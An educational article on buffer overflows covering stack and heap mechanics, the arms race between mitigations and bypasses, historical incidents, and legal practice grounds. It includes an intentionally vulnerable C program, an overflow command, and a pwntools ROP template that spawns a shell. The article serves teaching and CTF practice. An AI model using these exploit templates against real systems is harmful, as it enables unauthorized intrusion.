Buffer Overflow #
Buffer Overflow (BOF) is the classic among classics of memory-safety vulnerabilities: writing past the end of an allocated buffer and corrupting adjacent memory. From the 1988 Morris Worm that pivoted on gets() in fingerd to take down the early Internet, through Code Red, Slammer, Heartbleed, and the 2024 glibc CVE-2024-2961, most of the major Internet-scale incidents of the past 35 years have involved this vulnerability class.
It's tempting to think "we live in the Rust/Go era — surely this is a solved problem?" — but published statistics from the Microsoft Security Response Center and Google Project Zero report that about 70% of their CVEs are still memory safety bugs. Linux kernel / Windows internals / Chrome / Firefox / OpenSSL / FFmpeg / postfix — most of the foundational code carrying modern infrastructure is still C/C++, and new memory-safety CVEs ship monthly.
The goal of this article: dissect how a BOF actually happens in one diagram, and lay out the mitigation/bypass arms race in another. The order is stack BOF mechanics → heap BOF overview → shellcode injection → mitigations vs. bypasses → historical incidents → legitimate places to learn.
1. Why BOF still load-bearing today #
The reason BOF is still a live vulnerability class traces back to the foundational design of C/C++:
- No bounds checking on array access — neither compiler nor runtime stops
buf[1000000] strcpy,gets,sprintf,memcpy, etc. take no "size of the other side" parameter — APIs that trust input length- Pointers can address anything — out-of-range reads/writes and allocator-bypassing access are both possible
- No compile-time tracking of memory ownership — use-after-free, double-free aren't statically prevented
Memory-safe languages (Rust / Go / Swift / Java / Python / Ruby / C# / JavaScript) structurally prevent these by having the compiler or runtime check. But the vast majority of code is still C/C++, and the rewrite cost is enormous, so the realistic choice was to keep them alive with mitigations. Long-running rewrite projects — Rust adoption in the Linux kernel (2022→), the TypeScript→Rust migration at Microsoft, "new Android native code goes in Rust" — are all in motion. Even so, complete replacement is widely understood to take 20+ more years.
2. Stack-based BOF — what's actually happening behind a function call #
The most classic case, stack-based buffer overflow, requires dissecting the stack frame at function-call time. The relative position of local-variable buffers and the saved return address is the ignition point.
The minimal vulnerable program and the exploit flow:
// vulnerable.c — classic stack BOF
#include <string.h>
#include <stdio.h>
void vulnerable(char *input) {
char buf[64]; // 64 bytes on the stack
strcpy(buf, input); // ★ no size check → over 64 bytes corrupts saved RIP
printf("%s\n", buf);
}
int main(int argc, char **argv) {
if (argc > 1) vulnerable(argv[1]);
return 0;
}
# Build with mitigations off (modern OSes still apply runtime mitigations on top)
gcc -fno-stack-protector -no-pie -z execstack -O0 vulnerable.c -o vulnerable
# Distance to saved RIP: typically buf + saved RBP = 64 + 8 = 72 bytes
./vulnerable $(python3 -c 'print("A"*72 + "BBBBBBBB")') # → segfault at RIP=0x4242424242424242
The classification of "what the attacker stuffs into the input":
- Shellcode injection — fill buf with shellcode (a few dozen bytes of asm that spawns
/bin/sh) and put "buf's own address" at the saved-RIP slot. Defeated by NX (DEP) - ret2libc — point saved RIP at libc's
system()and pass the address of/bin/shas the argument. Defeated by ASLR - ROP (Return-Oriented Programming) — chain together pre-existing code fragments (gadgets) ending in
retto build arbitrary behavior. The mainstream of modern BOF exploits - JOP / SROP / COOP — variants of ROP
3. Heap-based BOF — corrupting chunk metadata #
A BOF in a buffer allocated with malloc() / new (the heap) is heap-based BOF. It can't seize PC as directly as a stack BOF, but corrupting the heap allocator's bookkeeping metadata can be promoted to arbitrary memory write (write-what-where).
In glibc's malloc (ptmalloc2), each chunk carries a [size | prev_size | data...] header, and free chunks are linked in a doubly linked list. A heap BOF rewriting the fd / bk pointers of the next chunk causes a subsequent unlink() to perform a write at an attacker-chosen address (the classic "unlink attack").
Modern glibc piles consistency checks on unlink(), but House of Force / House of Spirit / fastbin dup / tcache poisoning / large bin attack — a different technique per generation — keep being researched and published. The glibc 2.35+ tcache family is an especially active target.
Beyond heap BOF, important neighboring memory-safety bugs:
- Use-After-Free (UAF) — using a pointer after
free()→ the memory has been reallocated, so writes corrupt other data - Double Free —
free()-ing the same pointer twice → free list corruption - Type Confusion — treating an object as the wrong type (frequent in C++ vtables)
- Out-of-Bounds Read — Heartbleed (CVE-2014-0160) is this. Not a write, but a read leaks adjacent memory
All trace back to the same root: the compiler doesn't check pointer validity.
4. Mitigations vs. bypasses — the arms race #
BOF can't be completely eliminated, so OSes, compilers, and CPUs have layered mitigations on top. Each mitigation has a bypass — knowing the chain is the key to understanding why modern exploits look so complex.
# Check a binary's mitigations at a glance
checksec --file=./vulnerable
# Sample output:
# RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY
# Full RELRO Canary found NX enab. PIE en. No RPATH No RUNPATH No symbols Yes
# From Python via pwntools
python3 -c 'from pwn import *; print(checksec("./vulnerable"))'
"All mitigations on" ≠ "unexploitable." Combine one info leak (= an arbitrary-address read) with one BOF and modern exploits routinely punch through every defense. The best evidence: Pwn2Own sees full sandbox escapes against Chrome / Safari / iOS / Windows kernel several times a year. Mitigations make the wall taller; they don't make it impassable.
5. Historical incidents — the BOFs that changed the world #
Most of the Internet-scale incidents are BOF or its memory-safety neighbors:
| Year | Incident | Mechanism | Impact |
|---|---|---|---|
| 1988 | Morris Worm | Stack BOF in fingerd's gets() + sendmail debug + rsh brute force |
Took down ~10% of the Internet. First Internet worm; led to the founding of CERT |
| 1996 | Aleph One "Smashing the Stack" (Phrack 49) | The first textbook-grade explanation of stack BOF and shellcode | The starting point of modern exploitation. Still required reading |
| 2001 | Code Red (CVE-2001-0500) | BOF in IIS Index Server | 350,000 Windows servers infected, designed to DDoS the White House |
| 2003 | Slammer (SQL Slammer) (CVE-2002-0649) | A 376-byte UDP BOF packet against MS SQL Server 2000 | 75,000 hosts in 10 minutes, choked global Internet bandwidth, ATMs went down |
| 2014 | Heartbleed (CVE-2014-0160) | TLS heartbeat out-of-bounds READ in OpenSSL (BOF cousin) | 17% of HTTPS servers leaked private keys / sessions / passwords. A worldwide cert reissue event |
| 2017 | WannaCry / EternalBlue (CVE-2017-0144) | Heap overflow during SMBv1 struct parsing | 200,000+ Windows hosts hit by ransomware. NHS / rail / car factories went offline |
| 2024 | glibc CVE-2024-2961 (iconv ISO-2022-CN-EXT) |
Out-of-bounds write in glibc internal buffer | Combined with PHP filter chains for RCE PoCs, exploitable in multiple web apps |
The fact that memory-safety vulnerabilities haven't gone away in 30 years is the strong reason Microsoft and Google are moving new code to Rust. Rust adoption in the Linux kernel (2022), partial Windows kernel rewrites in Rust, "new Android native code defaults to Rust" — all consequences of the same realization.
6. Where to learn — legitimate practice grounds #
Trying it on someone else's system = a crime under unauthorized-access law. Learn on environments deliberately built to be vulnerable — that's the right entry point:
| Platform | Contents | Difficulty |
|---|---|---|
| pwn.college | Free university course from ASU. Curriculum from stack BOF → ROP → kernel exploit | Beginner → Advanced |
| pwnable.kr | Korean veteran pwn site. Per-level vulnerable binaries, get a shell | Beginner → Advanced |
| pwnable.tw | Taiwanese advanced pwn site. Heavy on heap and kernel exploit | Intermediate → Expert |
| picoCTF | Carnegie Mellon's beginner CTF. Past problems live forever in PicoGym, lots of pwn | Beginner |
| HackTheBox | General challenges → Pwn category | Beginner → Advanced |
| OverTheWire (Narnia, Behemoth, Vortex) | Classic BOF / format string wargames | Beginner → Intermediate |
| Microcorruption | Matasano's ARM-based embedded BOF wargame | Beginner → Intermediate |
| Exploit-Education (Phoenix, Nebula) | Successor to exploit-exercises. Series that ratchets up protections incrementally | Beginner → Intermediate |
The tools (all in Kali Linux):
# Dynamic analysis / debuggers
gdb + pwndbg / GEF / peda # Extended GDB (essential for modern pwn)
strace -f ./vulnerable # Syscall trace
ltrace ./vulnerable # Library call trace
# Static analysis / binary tooling
checksec --file=./bin # Show mitigations
ROPgadget --binary ./bin # Enumerate ROP gadgets
ropper --file ./bin # Same idea, different impl
objdump -d ./bin | less # Disassembly
radare2 ./bin / r2 ./bin # Lightweight reverse-engineering platform
ghidra # NSA's GUI decompiler
# Exploit development
python3 + pwntools # The de facto exploit-script library
# = I/O + auto ROP-chain + shellcode + transport wrapper
one_gadget ./libc.so.6 # List "single-address execve('/bin/sh')" sites in libc
A minimal pwntools exploit template:
from pwn import *
elf = ELF("./vulnerable")
libc = ELF("./libc.so.6")
p = process("./vulnerable") # locally / remote("host", port) for remote
# 1. Info-leak the libc base
p.sendline(b"A" * 64 + p64(elf.plt["puts"]))
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc_base = leak - libc.sym["puts"]
# 2. Build a ROP chain
rop = ROP(libc)
rop.raw(b"A" * 72) # padding to saved RIP
rop.system(next(libc.search(b"/bin/sh\x00")) + libc_base)
p.sendline(rop.chain())
p.interactive() # got shell
Don't run this outside of CTFs and practice platforms. Trying it against a live service is illegal the moment you do it. Internal pentesting at your employer requires written authorization (RoE). The same principles as the Kali Linux article's "law and ethics" apply.
Buffer Overflow is the direct consequence of a 1970s language design choice — "C/C++ has no memory bounds checking" — that has remained one of the principal Internet-scale attack surfaces for 30+ years. Holding stack-BOF mechanics (strcpy clobbers saved RIP → ret hijacks control) and its heap-side evolution (chunk-metadata corruption → write-where) in your head, alongside the layered mitigations (SSP / DEP / ASLR / PIE / CFI) and the bypass evolution (ROP / info leak / heap grooming) as a single map of the arms race, lets you read any modern memory-safety CVE writeup with a map already in hand.
The endgame answer is "rewrite into a memory-safe language," but with complete replacement taking 20+ more years, the honest 2026-era posture is layered defense: enable the mitigation stack correctly (verified with checksec), find memory-safety bugs early via fuzzing, start new projects in Rust / Go, and prefer bounds-checked replacement APIs (strncpy_s / snprintf / Rust wrappers / Google's bounds-checking patches) inside existing C/C++.